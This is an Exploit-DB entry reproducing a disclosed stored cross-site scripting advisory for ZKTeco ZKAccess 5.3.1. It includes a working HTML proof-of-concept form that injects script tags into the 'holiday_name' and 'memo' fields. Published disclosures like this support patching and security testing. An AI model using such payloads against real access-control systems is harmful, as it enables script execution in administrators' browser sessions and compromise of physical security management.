ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting

EDB-ID:

40328

CVE:

N/A

EDB Verified:

Author:

LiquidWorm

Type:

webapps

Exploit:   /  

Platform:

JSP

Date:

2016-08-31

Vulnerable App: 
<!--

ZKTeco ZKAccess Security System 5.3.1 Stored XSS Vulnerability


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 5.3.12252

Summary: ZKAccess Systems are built on flexible, open technology to provide
management, real-time monitoring, and control of your access control system-all
from a browser, with no additional software to install. Our secure Web-hosted
infrastructure and centralized online administration reduce your IT costs and
allow you to easily manage all of your access points in a single location. C3-100's
versatile design features take care of present and future needs with ease and
efficiency. It is one of the most rugged and reliable controllers on the market,
with a multitude of built-in features. The C3-100 can communicate at 38.4 Kbps
via RS-485 configuration or Ethernet TCP/IP networks. It can store up to 30,000
cardholders.

Desc: Input passed to the 'holiday_name' and 'memo' POST parameters is not properly
sanitised before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an affected
site.

Tested on: CherryPy/3.1.0beta3 WSGI Server
           Firmware: AC Ver 4.1.9 3893-07 Jan 6 2016
           Python 2.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5368
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5368.php


18.07.2016

-->


<html>
  <body>
    <form action="http://127.0.0.1/data/iaccess/AccHolidays/_new_/?_lock=1" method="POST">
      <input type="hidden" name="pk" value="None" />
      <input type="hidden" name="holiday&#95;name" value=""><script>alert&#40;1&#41;<&#47;script>" />
      <input type="hidden" name="holiday&#95;type" value="1" />
      <input type="hidden" name="start&#95;date" value="09&#47;13&#47;2016" />
      <input type="hidden" name="end&#95;date" value="10&#47;18&#47;2016" />
      <input type="hidden" name="loop&#95;by&#95;year" value="2" />
      <input type="hidden" name="memo" value=""><script>alert&#40;2&#41;<&#47;script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services